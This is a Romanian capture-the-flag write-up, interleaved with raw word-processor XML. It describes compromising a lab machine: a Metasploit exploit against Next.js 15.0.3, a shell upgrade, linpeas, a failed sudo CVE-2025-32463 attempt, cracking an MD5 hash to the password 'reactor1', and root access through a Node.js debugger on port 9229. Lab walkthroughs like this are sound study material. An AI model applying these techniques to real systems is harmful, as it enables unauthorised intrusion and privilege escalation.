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Incepem cu un nmap peste masina.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1279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1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Avem ssh si ceva pe portul 3000. Sa vedem ce e. Am dat un curl si pare sa fie o pagina web dupa return, deci hai sa o accesam din browser.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375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3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Ma pun sa vad ce gasesc pe aici. Pare sa fie un site static, deci am sa incerc sa vad daca dau de ceva prin fuzzing.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121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1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Nimic…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M-am mai uitat prin cod si am vazut ca are cateva hrefuri, poate trebuie sa le analizez pe astea.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0289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0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Le iau local cu wget </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>si ma uit prin ele.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Am vazut ca este mentionat ca folosim Next.js 15.0.3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window.next={version:"15.0.3",appDir:!0}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Cautam me metasploit daca exista vreo vulnerabilitate.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9255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9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Avem ceva, hai sa o incercam.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4442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4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Vedem ca a functionat.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Acum, sa ne upgradam putin shellul.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python3 -c 'import pty; pty.spawn("/bin/bash")'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-50800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>40005</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5591175" cy="50482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Asa arata mai bine. Acum, de la mine pe masina imi hostez un server http unde am salvat linpeas.sh sa vad niste privilege escalation.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8206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8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Dupa analiza, a fost interesant faptul ca versiunea de sudo aparea vulerabila, deci am cautat-o pe net.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Sudo version 1.9.15p5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Si am gasit urmatoarea vulnerabilitate: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hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t>https://github.com/zinzloun/CVE-2025-32463</w:t>
        </w:r>
      </w:hyperlink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Hai sa o incercam.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node@reactor:~$ git clone https://github.com/zinzloun/CVE-2025-32463.git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git clone https://github.com/zinzloun/CVE-2025-32463.git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Cloning into 'CVE-2025-32463'...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fatal: unable to access 'https://github.com/zinzloun/CVE-2025-32463.git/': Could not resolve host: github.com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Mda… Am sa o hostez de la mine pe masina si asa o iau.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86791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6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Imi cere parola, nu merge.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Hai sa merg mai in spate sa vad daca am ratat ceva.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5054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5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Avem un reactor.db adica sqlite.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03632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Sa fie mai usor ce citit, folosim sqlite3 din terminal si ne uitam la date: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94551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4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br/>
        <w:t xml:space="preserve"> Salvam hashurile alea si le calculam cu un hashcat.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La admin nu am reusit, dar la engineer e un hash md5. Parola aia este </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t>reactor1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t>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-47625</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>100330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5114925" cy="1009650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Acum putem cauta flagul la user.</w:t>
      </w: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-73025</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>306070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4362450" cy="1504950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Si acum inapoi la escaladarea la root. Eu nu puteam rula codul din /home/node pentru ca nu stiam parola la node, dar la engineer o stiu. Hai sa mai incerc odata.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67425" cy="123825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Ghinion. Inapoi la linpeas cu mine.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Ca sa imi fie viata mai usoara, pot pleca de pe consola de la metasploit si sa ma conectez ca engineer de pe masina mea cu ssh.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79195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7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Interesant port. 9229. Hai sa il cautam.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68718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68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Portul default de debugging la javascript.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4015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Si ruleaza ca si root.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node inspect 127.0.0.1:9229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3575" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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Ne da direct in consola. Hai sa vedem cine suntem.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62200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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La prima vedere pare ca tot nu avem drepuri, dar trebuie sa fim mai creativi.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Facem un child process si el ruleaza comanda.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2740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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  <w:r>
        <w:rPr>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Acum putem sa luam flagul de la root si am terminat.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5790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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github.com/zinzloun/CVE-2025-32463" TargetMode="External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LibreOffice/25.2.3.2$Linux_X86_64 LibreOffice_project/520$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>8</Pages>
  <Words>416</Words>
  <Characters>2037</Characters>
  <CharactersWithSpaces>2434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2026-06-21T01:13:50Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-21T03:45:21Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>